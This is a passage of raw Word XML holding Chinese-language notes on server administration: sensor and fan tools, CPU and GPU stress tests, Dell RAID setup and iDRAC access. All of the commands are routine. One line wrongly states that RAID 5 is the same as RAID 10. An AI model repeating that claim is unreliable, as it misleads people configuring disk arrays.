    <w:p w14:paraId="0254FF72" w14:textId="77777777" w:rsidR="004B4F84" w:rsidRPr="004B4F84" w:rsidRDefault="004B4F84" w:rsidP="009222EB">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B4F84">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>首先要关闭风扇自动调速功能，否则我们手动设置的转速是不会生效的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E212C10" w14:textId="77777777" w:rsidR="00323A20" w:rsidRPr="004B4F84" w:rsidRDefault="00323A20" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71737A92" w14:textId="77777777" w:rsidR="00323A20" w:rsidRDefault="00323A20" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB743CB" w14:textId="202D8856" w:rsidR="00B0792B" w:rsidRPr="00B0792B" w:rsidRDefault="00B0792B" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B0792B">
        <w:t>`sudo apt install -y ipmitool lm-sensors`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFA3CC3" w14:textId="17921F02" w:rsidR="00164D91" w:rsidRDefault="008C7765" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="648CC3F8" w14:textId="75AEE635" w:rsidR="008C7765" w:rsidRDefault="008C7765" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ipmitool</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以控制风扇转速</w:t>
      </w:r>
      <w:r w:rsidR="006900D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，获取进风口、出风口温度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D755F1E" w14:textId="57987B51" w:rsidR="006900D4" w:rsidRDefault="006900D4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lm</w:t>
      </w:r>
      <w:r>
        <w:t>-sensors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装后，你可以运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>ensors</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，这个可以获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>温度（本质上是读取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中某个存在的用于监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的文件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA36B0D" w14:textId="77777777" w:rsidR="00164D91" w:rsidRDefault="00164D91" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59155A9F" w14:textId="77777777" w:rsidR="00DB1479" w:rsidRDefault="00680547" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>除此之外，</w:t>
      </w:r>
      <w:r w:rsidR="00A312E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看显卡温度需要你安装</w:t>
      </w:r>
      <w:r w:rsidR="00A312E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nvidia</w:t>
      </w:r>
      <w:r w:rsidR="00A312E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>驱动，</w:t>
      </w:r>
      <w:r w:rsidR="00DB1479">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D62247" w14:textId="77777777" w:rsidR="00DB1479" w:rsidRPr="00FF37A0" w:rsidRDefault="00DB1479" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF37A0">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nvidia-smi -q -d TEMPERATURE | grep 'GPU Current Temp'| awk '{print $5}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747FFB4D" w14:textId="0768342B" w:rsidR="00680547" w:rsidRPr="00DB1479" w:rsidRDefault="00376601" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取显卡温度。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25465768" w14:textId="77777777" w:rsidR="00164D91" w:rsidRDefault="00164D91" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226FB978" w14:textId="1C955382" w:rsidR="009F55F5" w:rsidRDefault="002C6110" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关于如何监控温度的其他详细说明，参考鹏哥的文章（记录在本文的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运维一节）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C386F1" w14:textId="77777777" w:rsidR="009F55F5" w:rsidRPr="00164D91" w:rsidRDefault="009F55F5" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438CDFA3" w14:textId="44FD1D51" w:rsidR="009D746D" w:rsidRDefault="009D746D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="167" w:name="_Toc159779628"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>压力测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
    </w:p>
    <w:p w14:paraId="6CE2FB6D" w14:textId="77777777" w:rsidR="009D746D" w:rsidRDefault="009D746D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351D1DDB" w14:textId="75EFE396" w:rsidR="009D746D" w:rsidRDefault="000A7956" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000A7956">
        <w:t>stress -c 47</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74643BC4" w14:textId="6108E402" w:rsidR="00837F1F" w:rsidRDefault="00837F1F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时满载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内核运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A1991F" w14:textId="77777777" w:rsidR="009D746D" w:rsidRDefault="009D746D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="721D0020" w14:textId="1A51A6F4" w:rsidR="009D746D" w:rsidRDefault="009D746D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="_Toc159779629"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显卡压力测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w14:paraId="1209A9B3" w14:textId="77777777" w:rsidR="009D746D" w:rsidRDefault="009D746D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3D119C" w14:textId="77777777" w:rsidR="00E4784A" w:rsidRDefault="00E4784A" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE0FB3C" w14:textId="579B12FE" w:rsidR="00E4784A" w:rsidRDefault="00E4784A" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E4784A">
        <w:t>https://github.com/wilicc/gpu-burn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B300937" w14:textId="77777777" w:rsidR="009D746D" w:rsidRDefault="009D746D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E0F7171" w14:textId="5E6DE007" w:rsidR="00E4784A" w:rsidRDefault="00773FE0" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脱下来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidR="005638F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行命令</w:t>
      </w:r>
      <w:r w:rsidR="005638F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005638F8" w:rsidRPr="005638F8">
        <w:t>docker run --rm --gpus all gpu_burn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6032F8" w14:textId="77B8E7FF" w:rsidR="00E4784A" w:rsidRDefault="00E4784A" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670CD46E" w14:textId="77777777" w:rsidR="005638F8" w:rsidRDefault="005638F8" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36853987" w14:textId="77777777" w:rsidR="009D746D" w:rsidRDefault="009D746D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF3ED7E" w14:textId="3C9E17B9" w:rsidR="007A6C46" w:rsidRDefault="007A6C46" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="_Toc159779630"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>组装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w14:paraId="2439E4AE" w14:textId="2E4FADF7" w:rsidR="007A6C46" w:rsidRDefault="007A6C46" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24223E8D" w14:textId="5ED0B333" w:rsidR="007A6C46" w:rsidRDefault="00021D14" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器，通常再开机的时候按</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">trl+R </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ctrl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">+S F10 F11 F12 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>life</w:t>
      </w:r>
      <w:r>
        <w:t>cycle Controller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>boot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动次序、</w:t>
      </w:r>
      <w:r w:rsidR="00FC51AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidR="00FC51AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D9040F" w14:textId="77777777" w:rsidR="00FC51AB" w:rsidRDefault="00FC51AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CE1929" w14:textId="0F429254" w:rsidR="00FC51AB" w:rsidRDefault="008A136C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>device</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>raid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，删除默认的虚拟磁盘配置、阵列配置，自行选择上全部的磁盘，配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428391BD" w14:textId="77777777" w:rsidR="008A136C" w:rsidRDefault="008A136C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A601C6" w14:textId="46F576F1" w:rsidR="008A136C" w:rsidRDefault="009E02DB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>鹏哥：</w:t>
      </w:r>
      <w:r w:rsidR="009C32C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>硬件</w:t>
      </w:r>
      <w:r w:rsidR="009C32C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r w:rsidR="009C32C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有单独的</w:t>
      </w:r>
      <w:r w:rsidR="009C32C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r w:rsidR="009C32C8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡</w:t>
      </w:r>
      <w:r w:rsidR="00303C2A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、电源，</w:t>
      </w:r>
      <w:r w:rsidR="00831EAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>且读写磁盘扇区是平均读写，故磁盘寿命会长、</w:t>
      </w:r>
      <w:r w:rsidR="00831EAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r w:rsidR="00831EAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不影响</w:t>
      </w:r>
      <w:r w:rsidR="00831EAB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r w:rsidR="00820C56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；软件实现的</w:t>
      </w:r>
      <w:r w:rsidR="00820C56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r w:rsidR="00820C56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（即</w:t>
      </w:r>
      <w:r w:rsidR="00820C56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00820C56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装开始，会问你要不要软件</w:t>
      </w:r>
      <w:r w:rsidR="00820C56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r w:rsidR="00820C56">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00055ED2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>性能、稳定性远远低于硬件</w:t>
      </w:r>
      <w:r w:rsidR="00055ED2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RAID</w:t>
      </w:r>
      <w:r w:rsidR="00055ED2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D1A41" w14:textId="77777777" w:rsidR="00055ED2" w:rsidRDefault="00055ED2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00807EF7" w14:textId="67092C9E" w:rsidR="007A6C46" w:rsidRPr="007A6C46" w:rsidRDefault="006C2A32" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="_Toc159779631"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDRAC</w:t>
      </w:r>
      <w:r w:rsidR="00104E9D" w:rsidRPr="00104E9D">
        <w:t xml:space="preserve"> (IPMI)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w14:paraId="2E772BB3" w14:textId="77777777" w:rsidR="00792AD5" w:rsidRDefault="00792AD5" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1271D546" w14:textId="6566E41F" w:rsidR="00AA4138" w:rsidRDefault="00AA4138" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>DRAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在企业用的服务器上都会有个网口。</w:t>
      </w:r>
      <w:r w:rsidR="003562C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网线插上去，灯就会亮，灯不亮说明网线有问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFB0BC1" w14:textId="21D5D8E4" w:rsidR="003562C4" w:rsidRDefault="00A7565D" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该网卡和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>NIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>卡是相互独立的，配置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和笔记本连接，直接浏览器访问对应</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口即可访问。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0FAD63" w14:textId="0A323C4B" w:rsidR="00A7565D" w:rsidRDefault="007B60B2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以把公司的网线直接插</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDRAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>口，可以在公司网络访问该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA20695" w14:textId="77777777" w:rsidR="007B60B2" w:rsidRDefault="007B60B2" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE6ECC3" w14:textId="398328CE" w:rsidR="007B60B2" w:rsidRDefault="00A17BA8" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="210"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以控制服务器硬件相关的东西。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064FA7E8" w14:textId="77777777" w:rsidR="003562C4" w:rsidRDefault="003562C4" w:rsidP="009222EB">
      <w:pPr>
